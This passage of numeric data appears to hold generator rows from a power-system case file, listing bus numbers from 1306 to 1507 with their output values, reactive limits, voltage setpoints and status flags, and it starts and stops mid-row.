0, 0, 0, 0, 0], [1306, 0.553589, 0, 9999, -9999, 1.0, 100, 1, 1.827014, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1307, 0.08172, 0, 9999, -9999, 1.0, 100, 1, 0.29894, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1308, 0.130843, 0, 9999, -9999, 1.0, 100, 1, 3.278321, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1309, 1.474446, 0, 9999, -9999, 1.0, 100, 1, 3.34909, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1310, 0.725421, 0, 9999, -9999, 1.0, 100, 1, 1.64589, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1311, 1.031663, 0, 9999, -9999, 1.0, 100, 1, 11.854004, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1312, 88.488111, 0, 9999, -9999, 1.0, 100, 1, 262.264924, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1313, 12.733246, 0, 9999, -9999, 1.0, 100, 1, 30.836748, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1314, 5.351869, 0, 9999, -9999, 1.0, 100, 1, 12.003987, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1315, 4.25057, 0, 9999, -9999, 1.0, 100, 1, 7.879027, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1316, 0.00112, 0, 9999, -9999, 1.0, 100, 1, 2.757497, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1317, 7.087792, 0, 9999, -9999, 1.0, 100, 1, 23.958574, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1318, 0.872953, 0, 9999, -9999, 1.0, 100, 1, 1.956332, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1319, 3.541921, 0, 9999, -9999, 1.0, 100, 1, 17.708276, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1320, 3.357816, 0, 9999, -9999, 1.0, 100, 1, 20.75859, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1321, 0.014945, 0, 9999, -9999, 1.0, 100, 1, 0.161123, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1322, 0.326443, 0, 9999, -9999, 1.0, 100, 1, 0.929763, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1323, 26.831657, 0, 9999, -9999, 1.0, 100, 1, 199.111909, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1324, 5.704992, 0, 9999, -9999, 1.0, 100, 1, 13.063258, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1325, 4.290084, 0, 9999, -9999, 1.0, 100, 1, 90.497559, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1326, 11.711819, 0, 9999, -9999, 1.0, 100, 1, 56.928865, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1327, 10.383943, 0, 9999, -9999, 1.0, 100, 1, 50.796895, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1328, 3.41865, 0, 9999, -9999, 1.0, 100, 1, 16.063343, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1329, 48.507056, 0, 9999, -9999, 1.0, 100, 1, 218.675424, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1330, 2.804985, 0, 9999, -9999, 1.0, 100, 1, 30.131028, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1331, 0.095732, 0, 9999, -9999, 1.0, 100, 1, 0.289238, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1332, 2.760285, 0, 9999, -9999, 1.0, 100, 1, 26.293088, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1333, 9.576757, 0, 9999, -9999, 1.0, 100, 1, 45.650254, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1334, 0.022429, 0, 9999, -9999, 1.0, 100, 1, 1.215341, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1335, 0.265748, 0, 9999, -9999, 1.0, 100, 1, 3.306939, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1336, 3.545378, 0, 9999, -9999, 1.0, 100, 1, 29.773035, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1337, 22.344507, 0, 9999, -9999, 1.0, 100, 1, 121.31241, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1338, 0.214093, 0, 9999, -9999, 1.0, 100, 1, 0.832524, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1339, 2.516357, 0, 9999, -9999, 1.0, 100, 1, 10.086482, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1340, 13.229114, 0, 9999, -9999, 1.0, 100, 1, 70.098327, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1341, 47.643241, 0, 9999, -9999, 1.0, 100, 1, 205.513321, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1342, 0.033815, 0, 9999, -9999, 1.0, 100, 1, 0.734589, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1343, 0.00738, 0, 9999, -9999, 1.0, 100, 1, 1.102108, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1344, 0.057999, 0, 9999, -9999, 1.0, 100, 1, 0.226057, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1345, 0.272428, 0, 9999, -9999, 1.0, 100, 1, 3.971188, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1346, 45.358859, 0, 9999, -9999, 1.0, 100, 1, 214.719215, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1347, 63.290767, 0, 9999, -9999, 1.0, 100, 1, 414.115976, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1348, 3.70588, 0, 9999, -9999, 1.0, 100, 1, 22.707927, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1349, 9.859867, 0, 9999, -9999, 1.0, 100, 1, 42.352342, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1350, 0.017076, 0, 9999, -9999, 1.0, 100, 1, 0.094971, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1352, 0.002197, 0, 9999, -9999, 1.0, 100, 1, 0.83726, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1355, 0.755419, 0, 9999, -9999, 1.0, 100, 1, 1.688324, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1356, 9.781013, 0, 9999, -9999, 1.0, 100, 1, 73.486231, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1357, 8.494339, 0, 9999, -9999, 1.0, 100, 1, 56.459913, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1358, 0.11086, 0, 9999, -9999, 1.0, 100, 1, 0.247293, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1359, 16.722233, 0, 9999, -9999, 1.0, 100, 1, 70.633589, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1360, 5.123075, 0, 9999, -9999, 1.0, 100, 1, 17.135983, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1361, 21.709458, 0, 9999, -9999, 1.0, 100, 1, 63.207173, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1362, 23.853041, 0, 9999, -9999, 1.0, 100, 1, 79.107216, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1363, 0.006465, 0, 9999, -9999, 1.0, 100, 1, 0.036158, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1364, 0.00941, 0, 9999, -9999, 1.0, 100, 1, 0.061068, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1365, 8.7e-05, 0, 9999, -9999, 1.0, 100, 1, 0.000456, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1366, 0.05129, 0, 9999, -9999, 1.0, 100, 1, 1.229992, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1367, 7.056481, 0, 9999, -9999, 1.0, 100, 1, 43.863891, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1368, 0.031013, 0, 9999, -9999, 1.0, 100, 1, 3.298243, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1369, 4.897036, 0, 9999, -9999, 1.0, 100, 1, 7.968859, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1370, 0.172553, 0, 9999, -9999, 1.0, 100, 1, 0.343308, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1371, 20.724226, 0, 9999, -9999, 1.0, 100, 1, 81.767208, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1372, 29.807262, 0, 9999, -9999, 1.0, 100, 1, 192.966588, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1373, 4.674788, 0, 9999, -9999, 1.0, 100, 1, 35.200257, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1374, 49.28544, 0, 9999, -9999, 1.0, 100, 1, 108.220146, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1375, 24.798236, 0, 9999, -9999, 1.0, 100, 1, 61.223816, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1376, 49.048275, 0, 9999, -9999, 1.0, 100, 1, 176.213655, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1377, 33.834699, 0, 9999, -9999, 1.0, 100, 1, 234.376272, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1378, 25.705311, 0, 9999, -9999, 1.0, 100, 1, 246.029906, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1379, 0.226652, 0, 9999, -9999, 1.0, 100, 1, 0.805984, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1380, 0.401596, 0, 9999, -9999, 1.0, 100, 1, 1.213356, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1381, 0.288646, 0, 9999, -9999, 1.0, 100, 1, 1.01257, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1382, 83.384052, 0, 9999, -9999, 1.0, 100, 1, 138.839906, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1383, 63.97791, 0, 9999, -9999, 1.0, 100, 1, 109.821439, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1384, 1.328129, 0, 9999, -9999, 1.0, 100, 1, 4.669135, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1385, 0.025893, 0, 9999, -9999, 1.0, 100, 1, 0.124455, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1386, 0.157484, 0, 9999, -9999, 1.0, 100, 1, 0.673858, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1387, 1.012309, 0, 9999, -9999, 1.0, 100, 1, 3.493561, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1388, 0.307211, 0, 9999, -9999, 1.0, 100, 1, 0.928188, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1389, 0.070676, 0, 9999, -9999, 1.0, 100, 1, 0.213536, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1390, 1.081637, 0, 9999, -9999, 1.0, 100, 1, 3.732816, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1391, 0.158076, 0, 9999, -9999, 1.0, 100, 1, 0.521719, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1392, 4.735891, 0, 9999, -9999, 1.0, 100, 1, 19.306386, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1393, 0.290257, 0, 9999, -9999, 1.0, 100, 1, 1.376509, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1394, 0.239837, 0, 9999, -9999, 1.0, 100, 1, 1.077886, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1395, 0.016787, 0, 9999, -9999, 1.0, 100, 1, 0.073776, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1396, 0.004766, 0, 9999, -9999, 1.0, 100, 1, 0.026112, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1397, 5.955645, 0, 9999, -9999, 1.0, 100, 1, 25.084545, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1398, 0.652383, 0, 9999, -9999, 1.0, 100, 1, 2.779641, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1399, 5.784464, 0, 9999, -9999, 1.0, 100, 1, 17.868157, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1400, 0.272468, 0, 9999, -9999, 1.0, 100, 1, 1.297197, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1401, 25.058118, 0, 9999, -9999, 1.0, 100, 1, 89.339497, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1402, 8.116187, 0, 9999, -9999, 1.0, 100, 1, 26.328902, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1403, 20.05151, 0, 9999, -9999, 1.0, 100, 1, 119.651672, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1404, 26.262869, 0, 9999, -9999, 1.0, 100, 1, 134.800518, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1405, 8.43294, 0, 9999, -9999, 1.0, 100, 1, 29.550802, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1406, 3.072613, 0, 9999, -9999, 1.0, 100, 1, 10.763987, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1407, 0.054478, 0, 9999, -9999, 1.0, 100, 1, 0.211614, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1408, 6.92855, 0, 9999, -9999, 1.0, 100, 1, 41.078698, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1409, 1.834565, 0, 9999, -9999, 1.0, 100, 1, 12.019786, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1410, 5.91244, 0, 9999, -9999, 1.0, 100, 1, 37.466518, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1411, 6.560583, 0, 9999, -9999, 1.0, 100, 1, 39.395367, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1412, 0.757702, 0, 9999, -9999, 1.0, 100, 1, 5.987601, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1413, 0.640962, 0, 9999, -9999, 1.0, 100, 1, 5.679791, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1414, 2.807674, 0, 9999, -9999, 1.0, 100, 1, 25.992489, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1415, 0.766933, 0, 9999, -9999, 1.0, 100, 1, 7.454501, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1416, 0.805466, 0, 9999, -9999, 1.0, 100, 1, 7.958002, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1417, 0.000206, 0, 9999, -9999, 1.0, 100, 1, 0.001311, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1418, 15.774104, 0, 9999, -9999, 1.0, 100, 1, 88.264613, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1419, 4.785278, 0, 9999, -9999, 1.0, 100, 1, 33.260903, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1420, 0.165391, 0, 9999, -9999, 1.0, 100, 1, 1.399757, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1421, 0.619588, 0, 9999, -9999, 0.999642, 100, 1, 6.972369, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1422, 0.428329, 0, 9999, -9999, 1.0, 100, 1, 4.730495, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1423, 0.169795, 0, 9999, -9999, 1.0, 100, 1, 1.931017, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1424, 54.517794, 0, 9999, -9999, 1.0, 100, 1, 219.092115, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1425, 3.797384, 0, 9999, -9999, 1.0, 100, 1, 21.366402, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1426, 10.485231, 0, 9999, -9999, 1.0, 100, 1, 68.762602, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1427, 18.701963, 0, 9999, -9999, 1.0, 100, 1, 480.698671, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1428, 12.695649, 0, 9999, -9999, 1.0, 100, 1, 334.885743, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1429, 0.489133, 0, 9999, -9999, 1.0, 100, 1, 13.279826, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1430, 0.000396, 0, 9999, -9999, 1.0, 100, 1, 0.034248, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1431, 45.366563, 0, 9999, -9999, 1.0, 100, 1, 227.662022, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1432, 1.671841, 0, 9999, -9999, 1.0, 100, 1, 12.058931, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1433, 591.841848, 0, 9999, -9999, 1.0, 100, 1, 1289.241188, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1434, 14.584004, 0, 9999, -9999, 1.0, 100, 1, 99.440014, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1435, 22.83881, 0, 9999, -9999, 1.0, 100, 1, 86.713217, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1436, 16.17842, 0, 9999, -9999, 1.0, 100, 1, 98.434116, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1437, 23.782323, 0, 9999, -9999, 1.0, 100, 1, 238.321958, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1438, 19.45973, 0, 9999, -9999, 1.0, 100, 1, 392.815158, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1439, 9.838711, 0, 9999, -9999, 1.0, 100, 1, 99.103164, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1440, 0.033103, 0, 9999, -9999, 1.0, 100, 1, 0.833609, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1441, 0.084303, 0, 9999, -9999, 1.0, 100, 1, 0.171578, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1442, 0.180011, 0, 9999, -9999, 1.0, 100, 1, 0.715522, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1443, 26.932463, 0, 9999, -9999, 1.0, 100, 1, 103.005076, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1444, 1.20289, 0, 9999, -9999, 1.0, 100, 1, 8.981696, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1445, 3.888602, 0, 9999, -9999, 1.0, 100, 1, 25.036799, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1446, 113.908331, 0, 9999, -9999, 1.0, 100, 1, 758.547933, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1447, 21.039856, 0, 9999, -9999, 1.0, 100, 1, 89.477411, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1448, 2.214261, 0, 9999, -9999, 1.0, 100, 1, 7.523578, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1449, 26.761965, 0, 9999, -9999, 1.0, 100, 1, 95.437673, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1450, 17.147785, 0, 9999, -9999, 1.0, 100, 1, 59.256809, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1451, 20.99339, 0, 9999, -9999, 1.0, 100, 1, 68.198838, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1452, 6.90524, 0, 9999, -9999, 1.0, 100, 1, 24.068921, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1453, 35.902253, 0, 9999, -9999, 1.0, 100, 1, 64.93775, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1454, 85.582263, 0, 9999, -9999, 1.0, 100, 1, 155.126607, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1455, 0.198943, 0, 9999, -9999, 1.0, 100, 1, 0.654438, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1456, 13.891614, 0, 9999, -9999, 1.0, 100, 1, 50.054822, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1457, 0.662843, 0, 9999, -9999, 1.0, 100, 1, 2.002672, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1458, 0.081487, 0, 9999, -9999, 1.0, 100, 1, 0.246199, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1459, 1.115002, 0, 9999, -9999, 1.0, 100, 1, 5.309059, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1460, 7.000387, 0, 9999, -9999, 1.0, 100, 1, 101.498473, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1461, 5.124337, 0, 9999, -9999, 1.0, 100, 1, 17.951737, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1462, 0.683441, 0, 9999, -9999, 1.0, 100, 1, 2.402686, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1463, 0.194064, 0, 9999, -9999, 1.0, 100, 1, 0.711207, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1464, 42.666393, 0, 9999, -9999, 1.0, 100, 1, 218.884211, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1465, 1.311645, 0, 9999, -9999, 1.0, 100, 1, 5.299939, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1466, 1.755273, 0, 9999, -9999, 1.0, 100, 1, 5.685017, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1467, 0.628762, 0, 9999, -9999, 1.0, 100, 1, 2.096155, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1468, 7.470967, 0, 9999, -9999, 1.0, 100, 1, 23.789171, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1469, 16.978154, 0, 9999, -9999, 1.0, 100, 1, 65.007467, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1470, 26.438978, 0, 9999, -9999, 1.0, 100, 1, 78.965265, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1471, 54.498347, 0, 9999, -9999, 1.0, 100, 1, 159.165074, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1472, 3.903843, 0, 9999, -9999, 1.0, 100, 1, 11.980182, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1473, 1.964392, 0, 9999, -9999, 1.0, 100, 1, 8.362608, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1474, 0.415438, 0, 9999, -9999, 1.0, 100, 1, 1.398948, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1475, 0.091733, 0, 9999, -9999, 1.0, 100, 1, 0.39088, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1476, 40.82807, 0, 9999, -9999, 1.0, 100, 1, 250.480113, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1477, 2.669402, 0, 9999, -9999, 1.0, 100, 1, 12.122974, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1479, 0.578693, 0, 9999, -9999, 1.0, 100, 1, 5.592606, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1480, 1.869312, 0, 9999, -9999, 1.0, 100, 1, 18.681964, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1481, 0.013625, 0, 9999, -9999, 1.0, 100, 1, 0.053146, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1482, 3.076904, 0, 9999, -9999, 1.0, 100, 1, 17.51083, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1483, 1.118025, 0, 9999, -9999, 1.0, 100, 1, 3.599649, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1484, 0.009776, 0, 9999, -9999, 1.0, 100, 1, 0.02991, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1485, 0.184191, 0, 9999, -9999, 1.0, 100, 1, 0.563547, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1486, 0.947625, 0, 9999, -9999, 1.0, 100, 1, 2.89934, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1487, 0.292062, 0, 9999, -9999, 1.0, 100, 1, 1.142917, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1488, 0.119714, 0, 9999, -9999, 1.0, 100, 1, 5.569856, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1489, 0.032596, 0, 9999, -9999, 1.0, 100, 1, 0.118938, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1490, 174.585571, 0, 9999, -9999, 1.0, 100, 1, 782.463701, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1491, 21.972058, 0, 9999, -9999, 1.0, 100, 1, 84.622838, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1492, 48.954106, 0, 9999, -9999, 1.0, 100, 1, 229.927503, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1493, 21.42802, 0, 9999, -9999, 1.0, 100, 1, 83.557175, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1494, 36.412476, 0, 9999, -9999, 1.0, 100, 1, 404.486733, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1495, 7.208891, 0, 9999, -9999, 1.0, 100, 1, 66.920717, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1496, 4.7e-05, 0, 9999, -9999, 1.0, 100, 1, 0.000282, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1497, 20.550653, 0, 9999, -9999, 1.0, 100, 1, 89.070006, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1498, 39.624056, 0, 9999, -9999, 1.0, 100, 1, 105.800802, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1499, 0.198813, 0, 9999, -9999, 1.0, 100, 1, 2.286676, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1500, 0.05514, 0, 9999, -9999, 1.0, 100, 1, 0.154817, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1501, 1.940901, 0, 9999, -9999, 1.0, 100, 1, 8.165333, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1502, 0.003133, 0, 9999, -9999, 1.0, 100, 1, 0.938928, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1503, 6.085796, 0, 9999, -9999, 1.0, 100, 1, 45.972187, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1504, 33.965247, 0, 9999, -9999, 1.0, 100, 1, 188.822836, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1505, 0.826959, 0, 9999, -9999, 1.0, 100, 1, 26.765913, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1506, 0.086495, 0, 9999, -9999, 1.0, 100, 1, 56.406717, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1507, 